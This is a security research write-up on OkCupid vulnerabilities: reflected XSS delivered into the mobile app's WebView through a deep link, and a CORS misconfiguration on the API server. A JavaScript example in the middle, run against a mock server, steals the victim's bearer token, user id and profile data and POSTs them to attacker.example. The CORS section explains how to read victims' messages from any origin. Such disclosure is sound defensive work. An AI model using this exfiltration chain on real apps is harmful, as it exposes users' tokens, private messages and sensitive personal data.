Sensitive Data Exposure & Performing Actions on Behalf of the Victim

Up to this point, we are able to launch the OkCupid mobile application via a deep link that contains malicious JavaScript code in the section parameter. The following screenshot shows the final XSS payload, which loads jQuery and then loads JavaScript code from the attacker's server (note: the upper part contains the XSS payload and the lower part is the same payload, URL-encoded):

The following screenshot shows an HTTP GET request containing the final XSS payload (section parameter):

The server reflects the payload sent in the section parameter, and the injected JavaScript code is executed in the context of the WebView.

As mentioned before, the final XSS payload loads a script file from the attacker's server. The loaded JavaScript code is used for exfiltration and contains 3 functions:

  1. steal_token – Steals the user's authentication token, oauthAccessToken, and the user's id, userid. Sensitive user information (PII), such as the email address, is exfiltrated as well.
  2. steal_data – Steals the user's profile and private data such as preferences, user attributes (e.g. answers filled in during registration), and more.
  3. send_data_to_attacker – Sends the data collected in functions 1 and 2 to the attacker's server.

steal_token function:

The function makes an API call to the server. The user's cookies are sent with the request, since the XSS payload is executed in the context of the application's WebView.

The server responds with a large JSON object containing the user's id and the authentication token as well:

steal_data function:

The function creates an HTTP request to the endpoint.

Using the data exfiltrated in the steal_token function, the request is sent with the authentication token and the user's id.

The server responds with the victim's profile information, including email, sexual orientation, height, family status, etc.

send_data_to_attacker function:

The function creates a POST request to the attacker's server containing all the data retrieved by the previous functions (steal_token and steal_data).

The following screenshot shows an HTTP POST request sent to the attacker's server. The request body contains all of the victim's sensitive information:

Performing actions on behalf of the victim is also possible thanks to the exfiltration of the victim's authentication token and user id. This information is used in the malicious JavaScript code (in the same way as in the steal_data function).

An attacker can perform actions such as sending messages and changing profile data using the data exfiltrated in the steal_token function:

  1. The authentication token, oauthAccessToken, is used in the Authorization header (bearer value).
  2. The user id, userId, is added where required.

Note: An attacker cannot perform a full account takeover because the cookies are protected with HttpOnly: the script cannot read them, although it can still ride on them from inside the WebView, and the bearer token returned in the JSON body is not protected at all.
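To make the token flow concrete, here is an added example modelling the three functions above against an in-memory stand-in for the WebView's network stack. It is not the payload from the original research: the API host, endpoint paths, attacker host and victim data are all constructed, and only the field names oauthAccessToken and userid come from the write-up. The stand-in is synchronous for brevity where a real payload would use fetch or XMLHttpRequest. It shows the point the note makes: the HttpOnly session cookie is never visible to the script, yet the cookie-authenticated bootstrap call hands back a bearer token in readable JSON, and from then on that token alone authorises requests, with no cookie involved.

```javascript
// Added example, not the exfiltration payload from the original post.
// Hosts, paths and victim data below are constructed.

const API = "https://api.example";           // constructed stand-in for the API host
const ATTACKER = "https://attacker.example"; // constructed attacker host

const VICTIM = { // constructed victim record held by the mock server
  userid: "12345",
  oauthAccessToken: "tok_constructed",
  profile: { email: "victim@example.com", height: 180, orientation: "n/a" },
};

const attackerInbox = [];  // what the attacker's server receives
const documentCookie = ""; // HttpOnly session cookie: invisible to script

// Stand-in for the WebView's network stack. The WebView attaches the session
// cookie itself when a same-origin request is made with credentials included.
function webViewFetch(url, opts = {}) {
  const u = new URL(url);
  const headers = opts.headers || {};
  const sessionCookieSent = u.origin === API && opts.credentials === "include";

  if (u.pathname === "/bootstrap" && sessionCookieSent) {
    // Cookie-authenticated bootstrap: the token comes back in a readable JSON body.
    return { status: 200, json: { userid: VICTIM.userid, oauthAccessToken: VICTIM.oauthAccessToken } };
  }
  if (u.pathname === `/profile/${VICTIM.userid}` &&
      headers.Authorization === `Bearer ${VICTIM.oauthAccessToken}`) {
    // Bearer-authenticated profile read: no cookie is consulted here.
    return { status: 200, json: VICTIM.profile };
  }
  if (u.origin === ATTACKER && opts.method === "POST") {
    attackerInbox.push(JSON.parse(opts.body));
    return { status: 200, json: {} };
  }
  return { status: 401, json: { error: "unauthorized" } };
}

// 1. steal_token: cookie-authenticated call, token and id read out of the JSON.
function steal_token(fetchImpl) {
  const res = fetchImpl(`${API}/bootstrap`, { credentials: "include" });
  return { userId: res.json.userid, token: res.json.oauthAccessToken };
}

// 2. steal_data: the stolen token goes into the Authorization header as a
//    bearer value and the user id into the path; credentials are not included.
function steal_data(fetchImpl, { userId, token }) {
  const res = fetchImpl(`${API}/profile/${userId}`, {
    headers: { Authorization: `Bearer ${token}` },
  });
  return res.json;
}

// 3. send_data_to_attacker: POST everything collected to the attacker's host.
function send_data_to_attacker(fetchImpl, payload) {
  return fetchImpl(`${ATTACKER}/collect`, { method: "POST", body: JSON.stringify(payload) }).status;
}

// Runs the chain and returns what reached the attacker.
function runChain(fetchImpl = webViewFetch) {
  const creds = steal_token(fetchImpl);
  const profile = steal_data(fetchImpl, creds);
  send_data_to_attacker(fetchImpl, { ...creds, profile });
  return attackerInbox[attackerInbox.length - 1];
}

module.exports = { runChain, webViewFetch, steal_token, steal_data, documentCookie };
```

The instructive contrast is between the two server branches: the bootstrap route only answers when the WebView supplied the cookie, but the profile route is satisfied by the bearer header alone, which is why the exfiltrated token and id are enough to act on the victim's behalf from anywhere.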


Web Platform Vulnerabilities: Misconfigured Cross-Origin Resource Sharing Policy Leads to Sensitive Data Exposure

During the research, we found that the CORS policy of the API server api.OkCupid.com is not configured correctly, and any origin can send requests to the server and read its responses. The following shows a request sent to the API server from an arbitrary origin:

The server does not validate the origin properly and responds with the requested data. Moreover, the server response contains Access-Control-Allow-Origin and Access-Control-Allow-Credentials: true headers. For a credentialed cross-origin request the browser only exposes the response when Access-Control-Allow-Origin exactly matches the requesting origin (a wildcard is rejected when credentials are included), so for this to work from any origin the server has to be echoing back whatever Origin it receives:

From this point on, we found that we can send requests to the API server from our own domain without being blocked by the CORS policy.

As soon as a victim who is authenticated on OkCupid browses to the attacker's web application, an HTTP GET request is sent to the API server carrying the victim's cookies. The server's response is a large JSON object containing the victim's authentication token and the victim's user_id.

We were able to find more useful information in the bootstrap API endpoint response: sensitive API endpoints on the API server:

The following screenshot shows sensitive PII exfiltration from the /profile/ API endpoint, using the victim's user_id and access_token:

The following screenshot shows exfiltration of the victim's messages from the /1/messages/ API endpoint, using the victim's user_id and access_token:

Summary

The world of online dating apps has developed rapidly over the years, and has matured to where it is today with the shift to a digital world, especially in the past six months since the outbreak of Coronavirus around the world. "New normal" habits such as social distancing have forced the dating world to rely solely on digital tools.

The research presented here shows the risks associated with one of the longest-established and most popular apps in its sector. The dire need for privacy and data security becomes even more important when so much personal and intimate information is stored, handled and analyzed in an application. The platform and app were created to bring people together, but of course where people go, criminals will follow, looking for easy pickings.
